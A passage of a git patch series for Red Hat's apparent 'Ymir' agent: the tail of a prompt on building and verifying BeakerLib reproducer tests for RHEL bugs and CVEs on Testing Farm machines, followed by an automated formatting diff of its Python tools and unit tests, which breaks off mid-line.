time, memory, or disk usage + +#### 4.4. Create `runtest.sh` (BeakerLib Harness) + +Create `/runtest.sh` as an executable BeakerLib test harness (`chmod +x`). The harness follows this structure: + +```bash +#!/bin/bash +# SPDX-License-Identifier: GPL-2.0-or-later +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +# +# runtest.sh of +# Description: +# Author: Ymir AI Agent +# +# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +. /usr/share/beakerlib/beakerlib.sh || exit 1 + +PACKAGE="" + +rlJournalStart + rlPhaseStartSetup + rlAssertRpm "$PACKAGE" + rlRun "TmpDir=\\$(mktemp -d)" 0 "Creating tmp directory" + ORIG_DIR="$(pwd)" + rlRun "pushd \\$TmpDir" + # Copy test scripts and any input files to TmpDir + rlRun "cp \\$ORIG_DIR/test_* \\$TmpDir/" 0 "Copying test scripts" + # + # rlRun "gcc -o test_ test_.c $(pkg-config --cflags --libs ) -Wall" 0 "Compiling test program" + # + # rlRun "dnf install -y " 0 "Installing dependency" + rlPhaseEnd + + rlPhaseStartTest "" + # Run the reproducer and check the result + # + + # Example for crash bug: + # rlRun "./test_ " 0 "Program should not crash with fix applied" + + # Example for logic bug: + # rlRun "output=\\$(./test_.sh)" 0 "Running reproducer" + # rlAssertEquals "Output should match expected" "\\$output" "" + + # Example for memory bug: + # rlRun "valgrind --errors-for-leak-kinds=definite,indirect --error-exitcode=1 ./test_" 0 "No memory leaks" + + # Example for hang bug: + # rlRun "timeout 10s ./test_.sh" 0 "Program should complete within 10 seconds" + rlPhaseEnd + + rlPhaseStartCleanup + rlRun "popd" + rlRun "rm -rf \\$TmpDir" 0 "Removing tmp directory" + rlPhaseEnd +rlJournalPrintText +rlJournalEnd +``` + +Key rules for `runtest.sh`: +- `ORIG_DIR="$(pwd)"` must be set before `pushd` so test files can be copied to `$TmpDir`. +- The `rlRun` exit code check reflects the **fixed** behavior: `rlRun "command" 0` means PASS when the command exits 0 (fix applied, no crash). When the bug is present, the command will exit non-zero or crash, causing the test phase to FAIL. +- For crash bugs where you expect a signal: use `rlRun "command" 0` — when the fix is applied the program should not crash (exit 0), and when the bug is present it will crash (non-zero exit). +- For tests that need compilation: install `gcc`, `make`, and development headers in the Setup phase. +- Keep the harness minimal — all test logic belongs in the standalone `test_*` scripts. + +#### 4.5. Create `main.fmf` (FMF Metadata) + +Create `/main.fmf` with appropriate metadata: + +For CVE tests: +```yaml +summary: Security test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies + # - gcc (if test needs compilation) + # - valgrind (if using valgrind detection) +duration: 10m +tag: + - + - Security + - CVE +tier: "1" +``` + +For bug (regression) tests: +```yaml +summary: Regression test for in +description: | + +component: + - +test: ./runtest.sh +framework: beakerlib +require: + - + - beakerlib + # Add any additional runtime dependencies +duration: 10m +tag: + - + - Regression +tier: "1" +``` + +Adjust `duration` based on the test complexity. Use `5m` for simple tests, `10m` for standard tests, and `30m` for tests that require compilation, large inputs, or Valgrind. + +### Step 5: Copy Reproducer to TF Machine, Run, Iterate + +This is the agentic verification loop — the core of the agent. The goal is to verify that the reproducer actually detects the bug on a real RHEL system. This step iterates: copy the test, run it, analyze the result, fix issues, and try again. + +**Iteration limit:** Maximum 5 iterations. If the reproducer cannot be verified after 5 attempts, stop and report the bug as not reproducible (with documentation of what was tried). + +#### 5.1. Copy Test Files to the TF Machine + +1. Call `copy_files_to_remote` with: + - `ssh_host`: `ssh_connection` (from step 3) + - `local_paths`: list of all files in `test_dir` (e.g., `["/runtest.sh", "/test_.c", "/main.fmf", "/ai-test-description"]`) + - `remote_dir`: `/tmp/reproducer` + +2. Verify the copy succeeded by listing the remote directory: + ``` + run_remote_command(ssh_host=ssh_connection, command="ls -la /tmp/reproducer/") + ``` + +#### 5.2. Install Dependencies and Prepare the Environment + +1. Install the package under test and any dependencies on the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y beakerlib ") + ``` + +2. If the test requires compilation (C test program), install build tools: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y gcc make ") + ``` + +3. If the test requires Valgrind: + ``` + run_remote_command(ssh_host=ssh_connection, command="dnf install -y valgrind") + ``` + +4. Record the installed package version for the report: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q ") + ``` + +#### 5.3. Run the Reproducer + +1. Make the test scripts executable: + ``` + run_remote_command(ssh_host=ssh_connection, command="chmod +x /tmp/reproducer/runtest.sh /tmp/reproducer/test_*") + ``` + +2. Run the BeakerLib test harness: + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./runtest.sh", timeout=600) + ``` + +3. Alternatively, if running the standalone reproducer directly (for faster iteration during debugging): + ``` + run_remote_command(ssh_host=ssh_connection, command="cd /tmp/reproducer && ./ ", timeout=300) + ``` + +4. Capture the output, exit code, and any signals from the command result. + +#### 5.4. Analyze the Result + +Compare the output and exit code against the expected detection behavior: + +**Case A: Bug is REPRODUCED (test FAILS as expected — the bug is present)** +- The detection method fires: crash detected, wrong output observed, timeout hit, memory leak found, etc. +- This means the reproducer WORKS. The test correctly detects the bug on the unpatched system. +- Set `reproducer_verified` = true. +- Proceed to step 6 (return machine), then step 7 (create MR). + +**Case B: Bug is NOT reproduced (test PASSES — the bug is not triggered)** +- The program does not crash, output is correct, no timeout, no leak, etc. +- This means EITHER the reproducer is wrong OR the bug is not present on this system. +- Continue to 5.5 (iterate). + +**Case C: Test execution error (unrelated failure)** +- The test fails for a reason unrelated to the bug: missing dependency, compilation error, permission denied, wrong path, syntax error, etc. +- These are test bugs, not reproduction failures. +- Continue to 5.5 (iterate) — fix the test, not the detection method. + +**Important:** On a system WITHOUT the fix applied, a working reproducer should FAIL (Case A). The `rlRun "command" 0` in BeakerLib expects exit code 0 (fixed behavior). When the bug is present, the command exits non-zero, causing the BeakerLib phase to report FAIL. This FAIL means the reproducer is working correctly — it detected the bug. + +#### 5.5. Iterate on Failure (Cases B and C) + +If the reproducer did not detect the bug, increment `iteration_count` and analyze why. The analysis depends on the failure mode: + +**For Case B (bug not triggered):** + +1. **Check the package version**: Is the installed version actually vulnerable? If the system already has the fix, the test will PASS (correctly). Verify: + ``` + run_remote_command(ssh_host=ssh_connection, command="rpm -q --changelog | head -30") + ``` + If the fix is already applied on this compose, the test will not reproduce the bug. This is an expected outcome — note it and consider using an older compose, or document that the fix is already present and the reproducer is validated by the test's PASS/FAIL design. + +2. **Check trigger conditions**: Review whether the test correctly exercises the bug: + - Is the correct binary/library being tested? (Check `which `, `rpm -qf $(which )`) + - Are the right flags/options being used? + - Is the input data correctly crafted? (Examine it on the remote machine) + - Are environment variables or configuration settings correct? + +3. **Check the detection method**: Is the test checking for the right signal? + - For crash bugs: is the program actually crashing but being caught by a signal handler? Try running under `gdb` or checking `dmesg` / `journalctl` for segfault records. + - For logic bugs: is the expected output format wrong? Run the command manually and inspect actual output. + - For memory bugs: are you using the right Valgrind options? + +4. **Refine the test**: Based on the analysis, modify the test: + - Adjust input data (different size, different malformed fields, different structure) + - Add or change command-line flags + - Modify preconditions (create specific files, set environment variables) + - Try a different approach to triggering the bug + - Simplify — remove unnecessary complexity that might mask the bug + +**For Case C (test execution error):** + +1. **Fix compilation errors**: Read the error output, fix the test source code +2. **Fix missing dependencies**: Install additional packages +3. **Fix path issues**: Correct file paths, ensure scripts are executable +4. **Fix syntax errors**: Correct shell or program syntax +5. **Fix permission issues**: Adjust file permissions or run as appropriate user + +**After modifying the test:** + +1. Update the test files in `test_dir` locally (edit the files in place). +2. Re-copy the updated files to the TF machine: + ``` + run_remote_command(ssh_host=ssh_connection, command="rm -rf /tmp/reproducer/*") + copy_files_to_remote(ssh_host=ssh_connection, local_paths=[], remote_dir="/tmp/reproducer") + ``` +3. Re-run the reproducer (go back to 5.3). +4. If `iteration_count` >= 5, stop iterating and proceed to 5.6. + +#### 5.6. Handle Non-Reproducible Bugs + +If the bug could not be reproduced after the maximum number of iterations: + +1. Set `reproducer_verified` = false. +2. Document what was tried in each iteration: + - What trigger conditions were tested + - What the output/exit code was in each attempt + - What changes were made between iterations + - Why each attempt failed to reproduce the bug +3. Determine the likely reason for non-reproducibility: + - **Fix already applied**: the compose already includes the fix + - **Race condition**: requires specific timing that cannot be reliably triggered + - **Environment-specific**: requires hardware, kernel, or configuration not available on the TF machine + - **Complex preconditions**: requires a multi-service setup that cannot be simulated + - **Insufficient information**: the Jira issue and triage summary did not provide enough detail to design an effective trigger +4. Save the documentation as `not_reproducible_reason` for the output schema. +5. Propose setting Test Coverage to "Regression Only" in the Jira comment. + +### Step 6: Return Testing Farm Machine + +**CRITICAL:** This step MUST always execute, regardless of whether steps 3-5 succeeded or failed. Treat the entire step 3-5-6 sequence as a try/finally block — step 6 is the `finally`. + +1. If `tf_request_id` is set (a machine was reserved): + - Call `cancel_testing_farm_request` with `request_id` = `tf_request_id`. + - Log whether the cancellation succeeded or failed (but do not halt the workflow on failure). + +2. If `tf_request_id` is not set (reservation was never made or failed before returning a request ID), skip this step. + +3. Clear `ssh_connection` to prevent accidental reuse. + +Even if the reproducer verification succeeded, the machine must be returned. Even if an unrelated error occurred, the machine must be returned. Even if the agent is about to report an error, the machine must be returned. There are no exceptions. + +### Step 7: Create Merge Request (only if reproducer works) + +This step publishes the verified reproducer test as a merge request to the RHEL tests repository. Only execute this step if `reproducer_verified` is true AND `{{dry_run}}` is not true. + +If `reproducer_verified` is false, skip this step entirely. +If `{{dry_run}}` is true, skip this step but log what would have been created. + +#### 7.1. Prepare the Branch + +1. In the `tests_clone` directory, create a working branch: + ``` + git -C checkout -B reproducer/ + ``` + +2. Make shell scripts executable before staging (git tracks file mode): + ``` + chmod +x //runtest.sh //*.sh //*.ksh + ``` + +3. Stage all test files: + ``` + git -C add / + ``` + +4. Commit with a descriptive message: + ``` + : add reproducer for + + in ."> + in ."> + + + + Resolves: + + This test was created by Ymir, a Red Hat Enterprise Linux software maintenance AI agent. + + Assisted-by: Ymir + ``` + +#### 7.2. Fork, Push, and Create MR + +1. Fork the tests repository by calling `fork_repository` with: + - `repository`: `https://gitlab.com/redhat/rhel/tests/` + - Save the returned `fork_url`. + - If `fork_repository` fails (the tool returns an error), set `merge_request_url` to null, include the error message in the output `summary`, and skip the rest of step 7 entirely. Proceed directly to producing the output JSON. The reproducer test files are still valid in `test_dir` — only the MR creation is skipped. + +2. Push the branch by calling `push_to_remote_repository` with: + - `repository`: the fork URL from above + - `clone_path`: `tests_clone` + - `branch`: `reproducer/` + - If push fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +3. Create the merge request by calling `open_merge_request` with: + - `fork_url`: from above + - `title`: `: add reproducer for ` + - `source`: `reproducer/` + - `target`: the default branch of the tests repository (check with `run_shell_command("git -C symbolic-ref refs/remotes/origin/HEAD --short")` and strip the `origin/` prefix) + - `description`: + ``` + ## Summary + + in ."> + in ."> + + + + ## Pass/Fail Criteria + + - **PASS**: + - **FAIL**: + + ## Verification + + Verified on Testing Farm (request ID: ). + The reproducer successfully on (). + + ## Test Structure + + - `ai-test-description` — issue analysis and test specification + - `runtest.sh` — BeakerLib test harness + - `main.fmf` — FMF metadata + - `test_*` — standalone reproducer script(s) + + Resolves: + + --- + + > **Warning: AI-Generated MR**: Created by Ymir AI assistant. AI may make mistakes + or produce incorrect test logic. **Carefully review the test before merging. + Human RHEL QE needs to approve this contribution before merging.** + > + > By merging this MR, you agree to follow the Guidelines on Use of AI Generated Content + and Guidelines for Responsible Use of AI Code Assistants. + + ## Want to make changes to this MR? + + You can check out the source branch from the fork and push your changes directly. + + ## Customize Ymir's behavior for your package + + If there is anything that could be adjusted regarding Ymir's behavior + and is specific to your package, you can submit an MR to + gitlab.com/redhat/centos-stream/rules/. + See the customization docs for details. + + ## Questions or Issues? + + **Contact:** redhat-ymir-agent@redhat.com | **Slack:** #forum-ymir-package-automation | + **Report AI Issues:** Jira (project: Packit, component: jotnar) or GitHub + ``` + - If MR creation fails, set `merge_request_url` to null, include the error in the output `summary`, and skip the rest of step 7. Proceed to producing the output JSON. + +4. Save the returned MR URL as `merge_request_url`. + +5. Add the reproducer label by calling `add_merge_request_labels` with: + - `merge_request_url`: the MR URL from above + - `labels`: `["ymir_reproducer"]` + +--- + +**Note:** Do NOT post a Jira comment yourself. The workflow handles Jira commenting +automatically after you return your output. Focus on producing accurate output fields. + +--- + +## Output Schema + +The final output must be a JSON object: + +```json +{ + "jira_issue": "RHEL-12345", + "success": true, + "reproducer_type": "cve", + "test_mr_url": "https://gitlab.com/redhat/rhel/tests/ksh/-/merge_requests/123", + "testing_farm_request_id": "tf-request-abc123", + "pass_fail_criteria": "PASS: program exits 0 (fix applied, no crash). FAIL: program exits with SIGSEGV (bug present, buffer overflow triggered).", + "summary": "Created reproducer for CVE-2025-12345 in libfoo. The vulnerability is a heap buffer overflow in parse_header() triggered by a malformed PNG with chunk length > 0x7fffffff. Test sends crafted input and checks for crash via exit code.", + "not_reproducible_reason": null +} +``` + +On failure or non-reproducible result: + +```json +{ + "jira_issue": "RHEL-12345", + "success": false, + "reproducer_type": "bug", + "test_mr_url": null, + "testing_farm_request_id": "tf-request-xyz789", + "pass_fail_criteria": "PASS: command completes within 10s. FAIL: command hangs (timeout after 10s).", + "summary": "Attempted to reproduce RHEL-12345 (infinite loop in parser). The bug requires a specific interleaving of concurrent requests that could not be reliably reproduced in 5 attempts on a single-core TF machine.", + "not_reproducible_reason": "Race condition requires multi-threaded workload with specific timing. Attempted with stress-ng and taskset but could not trigger the hang reliably." +} +``` + +The output fields: +- `jira_issue` (string) — the Jira issue key (upper-case) +- `success` (bool) — whether a working reproducer was created and verified +- `reproducer_type` (string) — `"cve"` or `"bug"` +- `test_mr_url` (string or null) — URL of the merge request in the tests repository (null if not created) +- `testing_farm_request_id` (string or null) — Testing Farm request ID used for verification +- `pass_fail_criteria` (string) — human-readable description of what PASS and FAIL mean +- `summary` (string) — concise description of the reproducer +- `not_reproducible_reason` (string or null) — explanation if the bug could not be reproduced (null on success) From 2b50ed6e7d2297dc878bbe087756a0222e25c243 Mon Sep 17 00:00:00 2001 From: "pre-commit-ci[bot]" <66853113+pre-commit-ci[bot]@users.noreply.github.com> Date: Fri, 19 Jun 2026 13:02:11 +0000 Subject: [PATCH 16/16] [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see https://pre-commit.ci --- ymir/agents/reproducer_agent.py | 34 +--- ymir/tools/privileged/gitlab.py | 12 +- ymir/tools/privileged/testing_farm.py | 93 +++++----- .../tests/unit/test_testing_farm.py | 168 ++++++++---------- 4 files changed, 131 insertions(+), 176 deletions(-) diff --git a/ymir/agents/reproducer_agent.py b/ymir/agents/reproducer_agent.py index 2d545f64..f66f96cb 100644 --- a/ymir/agents/reproducer_agent.py +++ b/ymir/agents/reproducer_agent.py @@ -276,9 +276,7 @@ async def handle_results(state): comment_parts.append(f"\n*Summary*:\n{result.summary}") if result.not_reproducible_reason: - comment_parts.append( - f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}" - ) + comment_parts.append(f"\n*Not Reproducible Reason*:\n{result.not_reproducible_reason}") comment_text = "\n".join(comment_parts) @@ -357,19 +355,14 @@ async def main() -> None: user_triggered = task.user_triggered logger.info( f"Processing reproducer for JIRA issue: {input_data.jira_issue}, " - f"attempt: {task.attempts + 1}" - + (" (user-triggered)" if user_triggered else "") + f"attempt: {task.attempts + 1}" + (" (user-triggered)" if user_triggered else "") ) # Duplicate-processing guard: skip if the issue already has a # reproducer-terminal label and is not currently in-progress or # user-triggered (which always gets a fresh run). current_labels = await tasks.get_jira_labels(input_data.jira_issue) - terminal_ymir_labels = [ - label - for label in current_labels - if label in _REPRODUCER_TERMINAL_LABELS - ] + terminal_ymir_labels = [label for label in current_labels if label in _REPRODUCER_TERMINAL_LABELS] if ( terminal_ymir_labels and JiraLabels.REPRODUCER_IN_PROGRESS.value not in current_labels @@ -461,9 +454,7 @@ async def retry(task, error, input_data=input_data, user_triggered=user_triggere try: logger.info(f"Starting reproducer processing for {input_data.jira_issue}") - with span_processor.start_transaction( - input_data.jira_issue, workflow="reproducer" - ): + with span_processor.start_transaction(input_data.jira_issue, workflow="reproducer"): state = await run_workflow( input_data.jira_issue, dry_run, @@ -479,21 +470,13 @@ async def retry(task, error, input_data=input_data, user_triggered=user_triggere except Exception as e: error = "".join(traceback.format_exception(e)) - logger.error( - f"Exception during reproducer processing for " - f"{input_data.jira_issue}: {error}" - ) + logger.error(f"Exception during reproducer processing for {input_data.jira_issue}: {error}") await retry( task, - ErrorData( - details=error, jira_issue=input_data.jira_issue - ).model_dump_json(), + ErrorData(details=error, jira_issue=input_data.jira_issue).model_dump_json(), ) else: - logger.info( - f"Reproducer resolved as success={output.success} " - f"for {input_data.jira_issue}" - ) + logger.info(f"Reproducer resolved as success={output.success} for {input_data.jira_issue}") # Push the completed result to the completed list await fix_await( @@ -503,8 +486,7 @@ async def retry(task, error, input_data=input_data, user_triggered=user_triggere ) ) logger.info( - f"Pushed {input_data.jira_issue} to " - f"{RedisQueues.COMPLETED_REPRODUCER_LIST.value}" + f"Pushed {input_data.jira_issue} to {RedisQueues.COMPLETED_REPRODUCER_LIST.value}" ) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 02799c25..8745fff4 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -138,10 +138,7 @@ def _get_auth_headers(url: str) -> dict[str, str]: def _sanitize_git_stderr(text: str) -> str: """Filter out lines from git stderr that may contain auth credentials.""" - return "\n".join( - line for line in text.splitlines() - if not _SENSITIVE_STDERR_RE.search(line) - ) + return "\n".join(line for line in text.splitlines() if not _SENSITIVE_STDERR_RE.search(line)) def _get_git_auth_args(repository_url: str) -> list[str]: @@ -499,9 +496,7 @@ async def _run( Path("/tmp"), # noqa: S108 } if not any(clone_path.resolve().is_relative_to(p) for p in allowed_parents): - raise ToolError( - f"Refusing to remove {clone_path}: not under an allowed base directory" - ) + raise ToolError(f"Refusing to remove {clone_path}: not under an allowed base directory") await asyncio.to_thread(shutil.rmtree, clone_path) clone_path.parent.mkdir(parents=True, exist_ok=True) command = ["git", *auth_args, "clone", repository, str(clone_path)] @@ -550,7 +545,8 @@ async def _run( command.append("--force") env = _get_mock_git_env() proc = await asyncio.create_subprocess_exec( - command[0], *command[1:], + command[0], + *command[1:], cwd=clone_path, env=env, stdout=asyncio.subprocess.DEVNULL, diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index 4ef0a0f6..92435817 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -87,7 +87,9 @@ def _testing_farm_api_post(path: str, json: dict[str, Any]) -> Any: if not response.ok: logger.error( "POST to %s failed\nbody:\n%s\nerror:\n%s", - url, json_dumps(_redact_secrets(json), indent=2), response.text + url, + json_dumps(_redact_secrets(json), indent=2), + response.text, ) response.raise_for_status() return response.json() @@ -346,9 +348,7 @@ async def _run( response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) except Exception as e: - raise ToolError( - f"Failed to reserve Testing Farm machine: {e}" - ) from e + raise ToolError(f"Failed to reserve Testing Farm machine: {e}") from e return JSONToolOutput(result={"id": response["id"]}) @@ -383,9 +383,7 @@ async def _run( logger.info("Getting Testing Farm reservation details for %s", tool_input.request_id) if os.getenv("DRY_RUN", "False").lower() == "true": - return JSONToolOutput( - result={"state": "complete", "ssh_connection": "root@dry-run-host"} - ) + return JSONToolOutput(result={"state": "complete", "ssh_connection": "root@dry-run-host"}) max_attempts = 20 poll_interval = 30 @@ -407,7 +405,10 @@ async def _run( if is_transient: logger.warning( "Transient error %s polling TF %s (attempt %d/%d)", - e, tool_input.request_id, attempt, max_attempts, + e, + tool_input.request_id, + attempt, + max_attempts, ) if attempt < max_attempts: await asyncio.sleep(poll_interval) @@ -433,9 +434,7 @@ async def _run( log_resp = await asyncio.to_thread(requests.get, log_url, timeout=30) if log_resp.ok: log_text = log_resp.text - guest_match = re.search( - r"Guest is ready.*root@([\d\w.\-]+)", log_text - ) + guest_match = re.search(r"Guest is ready.*root@([\d\w.\-]+)", log_text) if not guest_match: guest_match = re.search( r"\[.*?\]\s+primary address:\s+([\d\w.\-]+)", log_text @@ -445,7 +444,9 @@ async def _run( ssh_connection = f"root@{guest_match.group(1)}" logger.info( "SSH available for %s: %s (attempt %d)", - tool_input.request_id, ssh_connection, attempt, + tool_input.request_id, + ssh_connection, + attempt, ) return JSONToolOutput( result={"state": state, "ssh_connection": ssh_connection} @@ -456,7 +457,10 @@ async def _run( if attempt < max_attempts: logger.info( "SSH not yet available for %s, polling again in %ds (attempt %d/%d)", - tool_input.request_id, poll_interval, attempt, max_attempts, + tool_input.request_id, + poll_interval, + attempt, + max_attempts, ) await asyncio.sleep(poll_interval) @@ -503,9 +507,7 @@ async def _run( try: await asyncio.to_thread(_testing_farm_api_delete, f"requests/{request_id}") except Exception as e: - raise ToolError( - f"Failed to cancel Testing Farm request {request_id}: {e}" - ) from e + raise ToolError(f"Failed to cancel Testing Farm request {request_id}: {e}") from e return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) @@ -516,9 +518,7 @@ class RunRemoteCommandToolInput(BaseModel): timeout: int = Field(default=300, description="Timeout in seconds for the command to finish") -class RunRemoteCommandTool( - Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] -): +class RunRemoteCommandTool(Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]]): name = "run_remote_command" description = """ Run a command on a remote machine via SSH. @@ -556,9 +556,12 @@ async def _run( _ensure_gateway_ssh_key() proc = await asyncio.create_subprocess_exec( "ssh", - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", ssh_host, command, stdout=asyncio.subprocess.PIPE, @@ -568,13 +571,9 @@ async def _run( except TimeoutError as e: proc.kill() await proc.wait() - raise ToolError( - f"Command timed out after {timeout}s on {ssh_host}: {command}" - ) from e + raise ToolError(f"Command timed out after {timeout}s on {ssh_host}: {command}") from e except Exception as e: - raise ToolError( - f"Failed to run command on {ssh_host}: {e}" - ) from e + raise ToolError(f"Failed to run command on {ssh_host}: {e}") from e return JSONToolOutput( result={ @@ -611,9 +610,7 @@ def validate_local_paths(cls, v: list[str]) -> list[str]: return v -class CopyFilesToRemoteTool( - Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] -): +class CopyFilesToRemoteTool(Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]]): name = "copy_files_to_remote" description = """ Copy files to a remote machine via SCP. @@ -650,16 +647,24 @@ async def _run( _ensure_gateway_ssh_key() ssh_opts = [ - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", ] active_proc = None try: # Create the remote directory active_proc = await asyncio.create_subprocess_exec( - "ssh", *ssh_opts, ssh_host, "mkdir", "-p", remote_dir, + "ssh", + *ssh_opts, + ssh_host, + "mkdir", + "-p", + remote_dir, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) @@ -671,25 +676,23 @@ async def _run( # Copy files via scp active_proc = await asyncio.create_subprocess_exec( - "scp", *ssh_opts, "-r", *local_paths, f"{ssh_host}:{remote_dir}", + "scp", + *ssh_opts, + "-r", + *local_paths, + f"{ssh_host}:{remote_dir}", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) if active_proc.returncode != 0: - raise RuntimeError( - f"SCP failed: {stderr.decode().strip()}" - ) + raise RuntimeError(f"SCP failed: {stderr.decode().strip()}") except TimeoutError as e: if active_proc: active_proc.kill() await active_proc.wait() - raise ToolError( - f"Copy operation timed out after {timeout}s to {ssh_host}:{remote_dir}" - ) from e + raise ToolError(f"Copy operation timed out after {timeout}s to {ssh_host}:{remote_dir}") from e except Exception as e: - raise ToolError( - f"Failed to copy files to {ssh_host}:{remote_dir}: {e}" - ) from e + raise ToolError(f"Failed to copy files to {ssh_host}:{remote_dir}: {e}") from e return JSONToolOutput(result={"copied": True, "remote_dir": remote_dir, "files": local_paths}) diff --git a/ymir/tools/privileged/tests/unit/test_testing_farm.py b/ymir/tools/privileged/tests/unit/test_testing_farm.py index 801921e9..d64ef973 100644 --- a/ymir/tools/privileged/tests/unit/test_testing_farm.py +++ b/ymir/tools/privileged/tests/unit/test_testing_farm.py @@ -123,9 +123,7 @@ async def test_reserve_machine_returns_request_id(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_post").and_return( - {"id": "abc-123"} - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_post").and_return({"id": "abc-123"}).once() out = await ReserveTestingFarmMachineTool().run( input={ @@ -184,9 +182,7 @@ def fake_post(path, json): } ) - stored_b64 = captured["body"]["environments"][0]["secrets"][ - "TF_RESERVATION_AUTHORIZED_KEYS_BASE64" - ] + stored_b64 = captured["body"]["environments"][0]["secrets"]["TF_RESERVATION_AUTHORIZED_KEYS_BASE64"] # Gateway key is used, not the agent-provided key decoded = base64.b64decode(stored_b64).decode() @@ -202,9 +198,7 @@ async def test_reservation_details_dry_run(monkeypatch): """DRY_RUN=true returns complete state with dry-run-host.""" monkeypatch.setenv("DRY_RUN", "true") - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-dry-001"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-dry-001"}) assert out.result == {"state": "complete", "ssh_connection": "root@dry-run-host"} @@ -219,25 +213,18 @@ async def test_reservation_details_running_with_guest(monkeypatch): "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, } - pipeline_log = ( - "some log output\n" - "Guest is ready at root@10.0.0.1\n" - "more output\n" - "execute task #1\n" - ) + pipeline_log = "some log output\nGuest is ready at root@10.0.0.1\nmore output\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-100" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-100").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 ).and_return(mock_resp).once() - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-100"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-100"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} @@ -247,15 +234,13 @@ async def test_reservation_details_pending_then_canceled(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-200" - ).and_return({"state": "pending"}).and_return({"state": "canceled"}) + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-200").and_return( + {"state": "pending"} + ).and_return({"state": "canceled"}) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-200"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-200"}) assert out.result == {"state": "canceled", "ssh_connection": "not-yet-available"} @@ -273,21 +258,17 @@ async def test_reservation_details_running_no_task_then_ready(monkeypatch): log_not_ready = "Guest is ready at root@10.0.0.1\nprovisioning still in progress\n" log_ready = "Guest is ready at root@10.0.0.1\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-300" - ).and_return(api_response) + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-300").and_return( + api_response + ) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 - ).and_return(flexmock(ok=True, text=log_not_ready)).and_return( - flexmock(ok=True, text=log_ready) - ) + ).and_return(flexmock(ok=True, text=log_not_ready)).and_return(flexmock(ok=True, text=log_ready)) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-300"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-300"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} @@ -302,23 +283,18 @@ async def test_reservation_details_multihost_pattern(monkeypatch): "run": {"artifacts": "https://artifacts.testing-farm.io/def456"}, } - pipeline_log = ( - "[guest1] primary address: 10.0.0.99\n" - "execute task #1\n" - ) + pipeline_log = "[guest1] primary address: 10.0.0.99\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-400" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-400").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/def456/pipeline.log", timeout=30 ).and_return(mock_resp).once() - out 